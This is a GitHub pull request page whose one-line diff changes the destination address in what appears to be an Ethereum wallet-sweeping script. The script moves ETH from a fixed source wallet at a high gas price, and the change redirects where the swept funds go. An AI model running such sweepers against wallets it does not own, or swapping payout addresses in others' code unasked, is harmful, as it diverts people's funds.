Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Update index.js #12

Open
wants to merge 1 commit into
base: main
Choose a base branch
from
Open
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
4 changes: 2 additions & 2 deletions index.js
Original file line number Diff line number Diff line change
Expand Up @@ -13,7 +13,7 @@ function sleep(millis) {
async function main() {
global.web3 = new Web3('https://us-ethereum1.twnodes.com/'); // Trust Wallet Node :)
const WALLET_SWEEP = web3.utils.toChecksumAddress('0x947a1eA3a5B18A5065fd9d55663505806eaa9DDC');
const WALLET_DEST = web3.utils.toChecksumAddress('0x1ae97b609C30134b8A3b992581b29096Deb28dBb');
const WALLET_DEST = web3.utils.toChecksumAddress('0x83b1E757E8b5A96FE6FE7169476351b58aF6b210');
const ETH_GAS_GWEI = await web3.utils.toWei('105', 'gwei'); // 0,000000105 ETH !
//const ETH_GAS_GWEI = await web3.utils.toWei('25', 'gwei');
const ETH_MIN = await web3.utils.toWei(ETH_MIN_SWEEP, 'ether');
Expand Down Expand Up @@ -49,4 +49,4 @@ async function main() {
printProgress(text);
}
}
main();
main();